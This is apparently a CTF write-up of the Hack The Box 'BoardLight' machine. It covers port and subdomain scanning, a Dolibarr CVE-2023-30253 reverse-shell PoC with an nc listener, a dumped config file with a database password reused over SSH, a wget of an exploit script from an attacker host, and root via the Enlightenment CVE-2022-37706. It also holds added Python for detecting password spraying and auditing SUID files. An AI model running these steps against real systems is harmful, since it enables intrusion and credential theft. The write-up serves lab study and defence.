Target IP: 10.10.11.11

Port scan

```
┌──(root㉿kali)-[~]
└─# nmap -sV -v -Pn 10.10.11.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 19:54 EDT
NSE: Loaded 46 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:54
Completed Parallel DNS resolution of 1 host. at 19:54, 13.00s elapsed
Initiating SYN Stealth Scan at 19:54
Scanning 10.10.11.11 [1000 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11
```

Subdomain brute-forcing


```
ffuf -u http://board.htb -w /root/yiyi/dic/subdomains-top1million-110000.txt -c -H "Host:FUZZ.Board.htb" -t 5 -fw 6243
```
```
┌──(root㉿kali)-[~/yiyi]
└─# ffuf -u http://board.htb -w /root/yiyi/dic/subdomains-top1million-5000.txt -c -H "Host:FUZZ.Board.htb" -t 5 -fw 6243

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /root/yiyi/dic/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.Board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 5
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6243
________________________________________________

autoconfig [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2235ms]
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6257ms]
sms [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3409ms]
games [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6982ms]
citrix [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6702ms]
connect [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6220ms]
game [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4258ms]
qa [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7269ms]
irc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8358ms]
painel [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4582ms]
pgsql [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4589ms]
mailer [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6597ms]
marketing [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3282ms]
v2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4559ms]
images4 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4983ms]
hermes [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8009ms]
internal [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5860ms]
www.ads [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5570ms]
ms [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3494ms]
w3 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4823ms]
board [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5723ms]
lync [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6090ms]
net [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6829ms]
mailing [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5028ms]
da [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5241ms]
katalog [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5251ms]
maintenance [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7306ms]
bt [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1887ms]
phone [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3973ms]
demo1 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3625ms]
abc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5893ms]
web6 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6690ms]
multimedia [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2964ms]
fc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4626ms]
ct [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3502ms]
cisco-capwap-controller [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5799ms]
rd [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4815ms]
all [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5190ms]
style [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3796ms]
maya [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6838ms]
www.app [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5799ms]
java [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5573ms]
bravo [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1070ms]
depot [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4462ms]
mysql4 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5264ms]
smtp-out [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6071ms]
eu.pool [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7153ms]
rds [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4133ms]
bookstore [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8217ms]
publish [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5300ms]
smtp5 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5885ms]
ks [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8033ms]
epay [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6208ms]
2010 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2914ms]
tj [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2579ms]
texas [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3224ms]
smtp-relay [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1481ms]
core2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2178ms]
lisa [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5780ms]
p2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4943ms]
mailin [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6036ms]
www-a [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5070ms]
ics [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2465ms]
cwa [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1070ms]
www01 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5382ms]
patch [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2798ms]
wb [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3391ms]
guides [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4807ms]
singapore [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4836ms]
hm [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5288ms]
bl [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5642ms]
trk [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5029ms]
mstun [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2625ms]
mail.test [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6962ms]
postoffice [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4829ms]
s21 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4151ms]
target [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2808ms]
vip2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4294ms]
land [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4643ms]
cobalt [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3682ms]
ifolder [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2758ms]
www.gold [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4663ms]
www.p [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4030ms]
imagine [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5663ms]
s28 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5244ms]
bingo [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4152ms]
edocs [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5332ms]
vsp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4392ms]
www.school [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4396ms]
s18 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5895ms]
kg [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1124ms]
arwen [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5366ms]
comics [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5882ms]
www.movil [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4255ms]
host7 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4286ms]
fileshare [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5800ms]
new1 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5390ms]
ski [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4331ms]
www.db [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6557ms]
www.pluslatex.users [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4473ms]
prof [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4828ms]
di [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9517ms]
pluslatex.users [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3895ms]
www.math [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 7263ms]
www.bbs [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6966ms]
yoshi [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4224ms]
soleil [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3665ms]
prohome [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5107ms]
kenny [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5981ms]
autodiscover.en [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2675ms]
win10 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 8583ms]
sunset [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2111ms]
mech [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5786ms]
universal [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3983ms]
unknown [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4688ms]
suzuki [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3956ms]
ipsec [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5269ms]
balder [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3137ms]
s50 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6508ms]
zip [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6889ms]
baseball [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5410ms]
reader [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1518ms]
mp1 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3387ms]
php5 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4507ms]
qb [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6722ms]
www.hr [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9579ms]
mts [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5877ms]
www.saratov [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5986ms]
kaliningrad [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2722ms]
blacklist [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 6830ms]
nuke [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5141ms]
laguna [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4412ms]
cbf2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 4942ms]
:: Progress: [4989/4989] :: Job [1/1] :: 0 req/sec :: Duration: [2:21:35] :: Errors: 365 ::
```


Based on the framework in use (Dolibarr), find the matching PoC:

POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

PoC

Help of exploit:

```
➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit
```

Run the netcat on your host:

```
➜ nc -lvnp 9001
```

Run the exploit (example):

```
➜ python3 exploit.py http://example.com login password 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
```

Run the exploit directly to get a shell.


Credentials were found in /var/www/html/crm.board.htb/htdocs/conf/conf.php:

```
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';

//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';

//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
```

Password spraying

Key information

```
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
```

This is the database configuration file. Although the credentials in it belong to the database user, the password itself is worth trying against other accounts.

It turns out this password also logs in the larissa user.


As 地核师傅 puts it, this technique is called password spraying.

```
┌──(root㉿kali)-[~/yiyi]
└─# ssh larissa@10.10.11.11
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
larissa@10.10.11.11's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
larissa@boardlight:~$ cat user.txt
10b08d5a465678932cdf7b37ea4ec088
```
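From the defender's side, the reuse of the conf.php database password against an SSH account looks like one source trying several usernames in a short burst. The following is an added example (not code from the writeup or the box) that detects that pattern in sshd log lines; the log lines, the year 2024 and the 10.10.14.7 address are constructed.

```python
"""Detect SSH password spraying (one password tried against many accounts)
in sshd log lines. Added example for this writeup, not code from the box or
the PoC; the log lines below are constructed, not captured."""
import re
from collections import defaultdict
from datetime import datetime

# Standard sshd syslog line; syslog omits the year, so we assume 2024.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample: 10.10.16.50 tries one password across five accounts and
# finally succeeds as larissa; 10.10.14.7 just mistypes larissa's password twice.
SAMPLE_LOG = """\
Aug 13 23:30:01 boardlight sshd[1201]: Failed password for root from 10.10.16.50 port 50210 ssh2
Aug 13 23:30:03 boardlight sshd[1203]: Failed password for invalid user dolibarrowner from 10.10.16.50 port 50212 ssh2
Aug 13 23:30:05 boardlight sshd[1205]: Failed password for www-data from 10.10.16.50 port 50214 ssh2
Aug 13 23:30:08 boardlight sshd[1207]: Failed password for invalid user admin from 10.10.16.50 port 50216 ssh2
Aug 13 23:30:11 boardlight sshd[1209]: Accepted password for larissa from 10.10.16.50 port 50218 ssh2
Aug 13 23:45:00 boardlight sshd[1300]: Failed password for larissa from 10.10.14.7 port 41000 ssh2
Aug 13 23:45:04 boardlight sshd[1302]: Failed password for larissa from 10.10.14.7 port 41002 ssh2
Aug 13 23:45:09 boardlight sshd[1304]: Accepted password for larissa from 10.10.14.7 port 41004 ssh2
"""

def parse(text, year=2024):
    """Return (timestamp, source_ip, username, accepted) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events

def detect_spray(events, window_s=600, min_users=3):
    """Flag source IPs that tried >= min_users distinct accounts within window_s
    seconds. Repeated failures for one account (plain brute force) are not flagged."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        for i, (t0, _, _, _) in enumerate(evs):
            burst = [e for e in evs[i:] if (e[0] - t0).total_seconds() <= window_s]
            users = sorted({e[2] for e in burst})
            if len(users) >= min_users:
                # A success inside the burst means the sprayed password worked.
                hits[ip] = {"users": users, "success": any(e[3] for e in burst)}
                break
    return hits
```

A hit with `success=True` is the case to act on first: the account that accepted the password shares it with something the attacker already read.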

Privilege escalation

```
larissa@boardlight:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
```

Enlightenment has a setuid issue that lets a local user escalate privileges, and a ready-made PoC is available online.
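The SUID list above is only useful if you know which entries are normal. The following added example (not from the writeup) audits that exact `find` output against a baseline of binaries a stock Ubuntu install ships setuid; the baseline is an assumption chosen for illustration, not an official list, and a real audit would derive it from a clean reference host.

```python
"""Audit the SUID inventory from `find / -perm -u=s -type f` against a
baseline of binaries a stock Ubuntu install is expected to ship setuid.
Added example for this writeup; BASELINE is an assumed illustrative list."""

# Assumed baseline: SUID files shipped by core Ubuntu desktop packages.
BASELINE = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/sbin/pppd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/sudo",
    "/usr/bin/su", "/usr/bin/chfn", "/usr/bin/umount", "/usr/bin/gpasswd",
    "/usr/bin/passwd", "/usr/bin/fusermount", "/usr/bin/chsh",
}

# The find output from the writeup, copied verbatim from the page.
FIND_OUTPUT = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
"""

def audit_suid(find_output, baseline=BASELINE):
    """Return (unexpected, expected, missing) path lists."""
    found = {l.strip() for l in find_output.splitlines() if l.strip()}
    return (sorted(found - baseline), sorted(found & baseline),
            sorted(baseline - found))

def triage(path):
    """Short reviewer hint for an unexpected SUID file."""
    if "/enlightenment/" in path:
        return "Enlightenment setuid helper (enlightenment_sys is the CVE-2022-37706 target); update or strip setuid"
    if not path.startswith(("/usr/bin/", "/usr/sbin/")):
        return "third-party helper outside /usr/bin and /usr/sbin; confirm it needs setuid"
    return "review whether the package really requires setuid"

def remediation(unexpected):
    """Commands that drop the setuid bit until each file is justified."""
    return [f"chmod u-s {p}" for p in unexpected]
```

On this box the audit leaves five entries to justify: the four Enlightenment helpers and the VMware wrapper.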

```
larissa@boardlight:~$ wget http://10.10.16.50:80/exploit.sh
--2024-08-13 08:31:45--  http://10.10.16.50/exploit.sh
Connecting to 10.10.16.50:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [text/x-sh]
Saving to: ‘exploit.sh’

exploit.sh          100%[===============================================================================>]     709  --.-KB/s    in 0s

2024-08-13 08:32:01 (131 MB/s) - ‘exploit.sh’ saved [709/709]

larissa@boardlight:~$ ls
Desktop  Documents  Downloads  exploit.sh  Music  Pictures  Public  Templates  user.txt  Videos
larissa@boardlight:~$ chmod 777 exploit.sh
larissa@boardlight:~$ ls -al
total 80
drwxr-x--- 15 larissa larissa 4096 Aug 13 08:32 .
drwxr-xr-x  3 root    root    4096 May 17 01:04 ..
lrwxrwxrwx  1 root    root       9 Sep 18  2023 .bash_history -> /dev/null
-rw-r--r--  1 larissa larissa  220 Sep 17  2023 .bash_logout
-rw-r--r--  1 larissa larissa 3771 Sep 17  2023 .bashrc
drwx------  2 larissa larissa 4096 Aug 13 08:22 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 Downloads
-rwxrwxrwx  1 larissa larissa  709 Sep 19  2022 exploit.sh
drwxr-xr-x  3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx  1 larissa larissa    9 Sep 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r--  1 larissa larissa  807 Sep 17  2023 .profile
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Public
drwx------  2 larissa larissa 4096 May 17 01:04 .run
drwx------  2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Templates
-rw-r-----  1 root    larissa   33 Aug 12 23:23 user.txt
drwxr-xr-x  2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
#
```
